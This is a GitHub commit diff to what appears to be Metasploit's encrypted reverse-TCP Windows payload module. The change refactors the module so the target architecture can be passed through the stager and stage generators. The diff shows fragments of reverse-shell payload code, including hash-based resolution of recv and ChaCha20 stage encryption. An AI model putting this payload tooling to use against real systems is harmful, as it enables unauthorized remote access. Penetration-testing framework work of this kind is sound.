Skip to content

Commit 08266be

Browse files
zeroSteinerzeroSteiner
committed
Pass around the conf and opts to share the arch
1 parent 9a34505 commit 08266be

File tree

1 file changed

+20
-18
lines changed

1 file changed

+20
-18
lines changed

lib/msf/core/payload/windows/encrypted_reverse_tcp.rb

Lines changed: 20 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -61,9 +61,9 @@ def generate(opts={})
6161

6262
src = ''
6363
if staged?
64-
src = generate_stager(conf)
64+
src = generate_stager(conf, opts)
6565
else
66-
src = generate_c_src(conf)
66+
src = generate_c_src(conf, opts)
6767
end
6868

6969
link_script = module_info['DefaultOptions']['LinkerScript']
@@ -92,9 +92,9 @@ def generate(opts={})
9292
comp_code
9393
end
9494

95-
def initial_code
95+
def initial_code(conf, opts = {})
9696
src = headers
97-
src << align_rsp if self.arch_to_s.eql?('x64')
97+
src << align_rsp if opts.fetch(:arch, self.arch_to_s).eql?('x64')
9898

9999
if staged?
100100
src << chacha_func_staged
@@ -104,8 +104,8 @@ def initial_code
104104
src << exit_proc
105105
end
106106

107-
def generate_stager(conf)
108-
src = initial_code
107+
def generate_stager(conf, opts = {})
108+
src = initial_code(conf, opts)
109109

110110
if conf[:call_wsastartup]
111111
src << init_winsock
@@ -115,7 +115,7 @@ def generate_stager(conf)
115115
src << get_load_library(conf[:host], conf[:port])
116116
src << call_init_winsock if conf[:call_wsastartup]
117117
src << start_comm(conf[:uuid])
118-
src << stager_comm
118+
src << stager_comm(conf, opts)
119119
end
120120

121121
def sends_hex_uuid?
@@ -148,21 +148,21 @@ def generate_stage(opts={})
148148
keep_exe: datastore['KeepExe'],
149149
show_compile_cmd: datastore['ShowCompileCMD'],
150150
f_name: Tempfile.new('reverse_pic_stage').path,
151-
arch: self.arch_to_s
151+
arch: opts.fetch(:arch, self.arch_to_s)
152152
}
153153

154-
src = initial_code
154+
src = initial_code(conf, opts)
155155
src << get_new_key
156156
src << init_proc
157-
src << exec_payload_stage
157+
src << exec_payload_stage(conf, opts)
158158
shellcode = get_compiled_shellcode(src, comp_opts)
159159

160160
stage_obj = Rex::Crypto::Chacha20.new(key, iv)
161161
stage_obj.chacha20_crypt(shellcode)
162162
end
163163

164-
def generate_c_src(conf)
165-
src = initial_code
164+
def generate_c_src(conf, opts = {})
165+
src = initial_code(conf, opts)
166166

167167
if conf[:call_wsastartup]
168168
src << init_winsock
@@ -552,9 +552,10 @@ def single_comm
552552
^
553553
end
554554

555-
def stager_comm
556-
reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
557-
inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
555+
def stager_comm(conf, opts = {})
556+
arch = opts.fetch(:arch, self.arch_to_s)
557+
reg = arch.eql?('x86') ? 'edi' : 'rdi'
558+
inst = arch.eql?('x86') ? 'movl' : 'movq'
558559

559560
%Q^
560561
FuncRecv RecvData = (FuncRecv) GetProcAddressWithHash(#{get_hash('ws2_32.dll', 'recv')}); // hash('ws2_32.dll', 'recv') -> 0x5fc8d902
@@ -596,9 +597,10 @@ def stager_comm
596597
^
597598
end
598599

599-
def exec_payload_stage
600-
reg = self.arch_to_s.eql?('x86') ? 'edi' : 'rdi'
601-
inst = self.arch_to_s.eql?('x86') ? 'movl' : 'movq'
600+
def exec_payload_stage(conf, opts = {})
601+
arch = opts.fetch(:arch, self.arch_to_s)
602+
reg = arch.eql?('x86') ? 'edi' : 'rdi'
603+
inst = arch.eql?('x86') ? 'movl' : 'movq'
602604

603605
%Q^
604606
void ExecutePayload()

0 commit comments

Comments
 (0)